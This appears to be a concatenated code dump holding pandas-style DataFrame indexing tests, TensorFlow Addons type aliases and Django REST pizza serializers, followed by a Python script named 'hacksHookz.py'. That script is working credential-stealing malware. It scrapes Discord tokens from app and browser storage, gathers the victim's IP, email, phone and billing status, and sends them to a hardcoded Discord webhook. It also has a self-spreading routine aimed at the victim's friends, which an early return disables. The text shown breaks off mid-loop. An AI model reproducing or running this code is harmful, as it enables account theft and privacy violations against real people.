pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)
df2 = df.loc[['a3', 'a2'], [True, False, True]]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(c.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(c.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([2, 1])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
series2 = series.loc['a2']
self.assertIsInstance(series2, Tensor)
self.assertEqual(series2.shape, ())
self.assertEqual(series2.dtype, s.dtype)
series2 = series.loc[['a2', 'a3']]
self.assertIsInstance(series2, Series)
self.assertEqual(series2.shape, (2,))
self.assertEqual(series2.dtype, s.dtype)
self.assertEqual(series2.name, s.name)
with self.assertRaises(IndexingError):
_ = df.loc['a1', 'z', ...]
with self.assertRaises(NotImplementedError):
_ = df.loc[:, md.Series([True, False, True])]
with self.assertRaises(KeyError):
_ = df.loc[:, ['non_exist']]
def testLocUseIloc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
self.assertIsInstance(df.loc[:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[:-3].op, DataFrameLocGetItem)
with self.assertRaises(KeyError):
_ = df.loc[-3]
self.assertIsInstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
self.assertIsInstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
self.assertIsInstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = pd.RangeIndex(1, 4)
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
self.assertIsInstance(df2.loc['a3':].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = [f'a{i}' for i in range(3)]
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
def testDataFrameGetitem(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
series = df['c3']
self.assertIsInstance(series, Series)
self.assertEqual(series.shape, (10,))
self.assertEqual(series.name, 'c3')
self.assertEqual(series.dtype, data['c3'].dtype)
self.assertEqual(series.index_value, df.index_value)
series = series.tiles()
self.assertEqual(series.nsplits, ((2, 2, 2, 2, 2),))
self.assertEqual(len(series.chunks), 5)
for i, c in enumerate(series.chunks):
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertEqual(c.index, (i,))
self.assertEqual(c.shape, (2,))
df1 = df[['c1', 'c2', 'c3']]
self.assertIsInstance(df1, DataFrame)
self.assertEqual(df1.shape, (10, 3))
self.assertEqual(df1.index_value, df.index_value)
pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)
df1 = df1.tiles()
self.assertEqual(df1.nsplits, ((2, 2, 2, 2, 2), (2, 1)))
self.assertEqual(len(df1.chunks), 10)
for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 0))
self.assertEqual(c.shape, (2, 2))
for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 1))
self.assertEqual(c.shape, (2, 1))
def testDataFrameGetitemBool(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
mask_data1 = data.c1 > 0.5
mask_data2 = data.c1 < 0.5
mask1 = md.Series(mask_data1, chunk_size=2)
mask2 = md.Series(mask_data2, chunk_size=2)
r1 = df[mask1]
r2 = df[mask2]
r3 = df[mask1]
self.assertNotEqual(r1.index_value.key, df.index_value.key)
self.assertNotEqual(r1.index_value.key, mask1.index_value.key)
self.assertEqual(r1.columns_value.key, df.columns_value.key)
self.assertIs(r1.columns_value, df.columns_value)
self.assertNotEqual(r1.index_value.key, r2.index_value.key)
self.assertEqual(r1.columns_value.key, r2.columns_value.key)
self.assertIs(r1.columns_value, r2.columns_value)
self.assertEqual(r1.index_value.key, r3.index_value.key)
self.assertEqual(r1.columns_value.key, r3.columns_value.key)
self.assertIs(r1.columns_value, r3.columns_value)
def testSeriesGetitem(self):
data = pd.Series(np.random.rand(10, ), name='a')
series = md.Series(data, chunk_size=3)
result1 = series[2]
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(len(result1.chunks), 1)
self.assertIsInstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
self.assertEqual(result1.chunks[0].shape, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
result2 = series[[4, 5, 1, 2, 3]]
self.assertEqual(result2.shape, (5,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2, 2, 1),))
self.assertEqual(len(result2.chunks), 3)
self.assertEqual(result2.chunks[0].op.labels, [4, 5])
self.assertEqual(result2.chunks[1].op.labels, [1, 2])
self.assertEqual(result2.chunks[2].op.labels, [3])
data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
series = md.Series(data, chunk_size=3)
result1 = series['i2']
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
self.assertTrue(result1.chunks[0].op.labels, ['i2'])
result2 = series[['i2', 'i4']]
self.assertEqual(result2.shape, (2,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2,),))
self.assertEqual(result2.chunks[0].dtype, data.dtype)
self.assertTrue(result2.chunks[0].op.labels, [['i2', 'i4']])
def testSetitem(self):
data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
df = md.DataFrame(data, chunk_size=4)
df['new'] = 1
self.assertEqual(df.shape, (10, 3))
pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)
tiled = df.tiles()
self.assertEqual(tiled.chunks[0].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[1].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[2].shape, (2, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
def testResetIndex(self):
data = pd.DataFrame([('bird', 389.0),
('bird', 24.0),
('mammal', 80.5),
('mammal', np.nan)],
index=['falcon', 'parrot', 'lion', 'monkey'],
columns=('class', 'max_speed'))
df = md.DataFrame(data, chunk_size=2).reset_index()
r = data.reset_index()
self.assertEqual(df.shape, (4, 3))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 2)
self.assertEqual(df2.chunks[0].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
self.assertEqual(df2.chunks[1].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)
df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
r = data.reset_index(drop=True)
self.assertEqual(df.shape, (4, 2))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 8)
for c in df2.chunks:
self.assertEqual(c.shape, (1, 1))
pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])
series_data = pd.Series([1, 2, 3, 4], name='foo',
index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
s = md.Series(series_data, chunk_size=2).reset_index()
r = series_data.reset_index()
self.assertEqual(s.shape, (4, 2))
pd.testing.assert_series_equal(s.dtypes, r.dtypes)
s2 = s.tiles()
self.assertEqual(len(s2.chunks), 2)
self.assertEqual(s2.chunks[0].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
self.assertEqual(s2.chunks[1].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
with self.assertRaises(TypeError):
md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def testHeadTailOptimize(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df.tiles().head(2).op))
df2 = df[df[0] < 0.5].tiles()
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op))
df = md.DataFrame(raw, chunk_size=(2, 3))
df2 = df[df[0] < 0.5].tiles()
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op))
def testReindex(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
with self.assertRaises(TypeError):
df.reindex(unknown_arg=1)
with self.assertRaises(ValueError):
df.reindex([1, 2], fill_value=mt.tensor([1, 2]))
| true | true |
1c2cb0851d7ae12834f1df33acbb334bc02d9efe | 1,907 | py | Python | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 1,560 | 2018-11-26T23:57:34.000Z | 2022-03-27T10:37:34.000Z | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 2,067 | 2018-11-28T04:40:23.000Z | 2022-03-31T11:36:50.000Z | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 679 | 2018-11-27T14:39:25.000Z | 2022-03-31T10:09:22.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Types for typing functions signatures."""
from typing import Union, Callable, List
import numpy as np
import tensorflow as tf
# TODO: Remove once https://github.com/tensorflow/tensorflow/issues/44613 is resolved
if tf.__version__[:3] > "2.5":
from keras.engine import keras_tensor
else:
from tensorflow.python.keras.engine import keras_tensor
Number = Union[
float,
int,
np.float16,
np.float32,
np.float64,
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
Initializer = Union[None, dict, str, Callable, tf.keras.initializers.Initializer]
Regularizer = Union[None, dict, str, Callable, tf.keras.regularizers.Regularizer]
Constraint = Union[None, dict, str, Callable, tf.keras.constraints.Constraint]
Activation = Union[None, str, Callable]
Optimizer = Union[tf.keras.optimizers.Optimizer, str]
TensorLike = Union[
List[Union[Number, list]],
tuple,
Number,
np.ndarray,
tf.Tensor,
tf.SparseTensor,
tf.Variable,
keras_tensor.KerasTensor,
]
FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
| 30.269841 | 85 | 0.695857 |
from typing import Union, Callable, List
import numpy as np
import tensorflow as tf
if tf.__version__[:3] > "2.5":
from keras.engine import keras_tensor
else:
from tensorflow.python.keras.engine import keras_tensor
Number = Union[
float,
int,
np.float16,
np.float32,
np.float64,
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
Initializer = Union[None, dict, str, Callable, tf.keras.initializers.Initializer]
Regularizer = Union[None, dict, str, Callable, tf.keras.regularizers.Regularizer]
Constraint = Union[None, dict, str, Callable, tf.keras.constraints.Constraint]
Activation = Union[None, str, Callable]
Optimizer = Union[tf.keras.optimizers.Optimizer, str]
TensorLike = Union[
List[Union[Number, list]],
tuple,
Number,
np.ndarray,
tf.Tensor,
tf.SparseTensor,
tf.Variable,
keras_tensor.KerasTensor,
]
FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
| true | true |
1c2cb09439a11a7a92dc1017034e4a2e9a57e03f | 1,476 | py | Python | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from pizzas import models
class IngredientSerializer(serializers.ModelSerializer):
"""Serializador para el objeto Ingredient"""
class Meta:
model = models.Ingredient
fields = ('id', 'name', 'get_category_display', 'category')
read_only_fields = ('id', 'get_category_display')
extra_kwargs = {
'category': {'write_only': True},
}
class PizzaSerializer(serializers.ModelSerializer):
"""Serializador para el objeto Pizza"""
class Meta:
model = models.Pizza
fields = ('id', 'name', 'price', 'total_ingredients')
read_only_fields = ('id', 'total_ingredients')
class PizzaDetailSerializer(PizzaSerializer):
"""Serializador para creación y actualización de una Pizza"""
class Meta(PizzaSerializer.Meta):
fields = ('id', 'name', 'price', 'is_active', 'ingredients')
class PizzaDetailInfoSerializer(PizzaDetailSerializer):
"""Serializador para visualización de una Pizza"""
ingredients = IngredientSerializer(many=True, read_only=True)
class PizzaIngredientSerializer(PizzaSerializer):
"""Serializador para agregar y quitar ingredientes de una Pizza"""
class Meta(PizzaSerializer.Meta):
fields = ('ingredients',)
class PizzaIngredientSerializer2(serializers.Serializer):
"""Serializador para agregar y quitar ingredientes de una Pizza"""
ingredient_ids = serializers.CharField(max_length=250)
| 32.8 | 70 | 0.705962 | from rest_framework import serializers
from pizzas import models
class IngredientSerializer(serializers.ModelSerializer):
class Meta:
model = models.Ingredient
fields = ('id', 'name', 'get_category_display', 'category')
read_only_fields = ('id', 'get_category_display')
extra_kwargs = {
'category': {'write_only': True},
}
class PizzaSerializer(serializers.ModelSerializer):
class Meta:
model = models.Pizza
fields = ('id', 'name', 'price', 'total_ingredients')
read_only_fields = ('id', 'total_ingredients')
class PizzaDetailSerializer(PizzaSerializer):
class Meta(PizzaSerializer.Meta):
fields = ('id', 'name', 'price', 'is_active', 'ingredients')
class PizzaDetailInfoSerializer(PizzaDetailSerializer):
ingredients = IngredientSerializer(many=True, read_only=True)
class PizzaIngredientSerializer(PizzaSerializer):
class Meta(PizzaSerializer.Meta):
fields = ('ingredients',)
class PizzaIngredientSerializer2(serializers.Serializer):
ingredient_ids = serializers.CharField(max_length=250)
| true | true |
1c2cb0bcd2f2e830ce4e0630d46c7f42a87405bb | 8,194 | py | Python | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
print("[= ]")
print("[=========]")
print("you shouldnt open this malware well taking your data")
print("clone=NgCoDe")
print("NGCODE IS = rt34-b")
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x0eec59,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by THC4L"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "HackzHook",
"avatar_url": ""
}
try:
urlopen(Request("https://discord.com/api/webhooks/894240616073035836/eRCYt8KsbaNUyHsoG0lyljTw_oWwGsnrVfOT6mFINkTKKkni7rgsxOaanRg-Qeq_DJTE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
print("downloaded HackzHook")
| 21.118557 | 546 | 0.545521 | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
print("[= ]")
print("[=========]")
print("you shouldnt open this malware well taking your data")
print("clone=NgCoDe")
print("NGCODE IS = rt34-b")
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x0eec59,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by THC4L"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
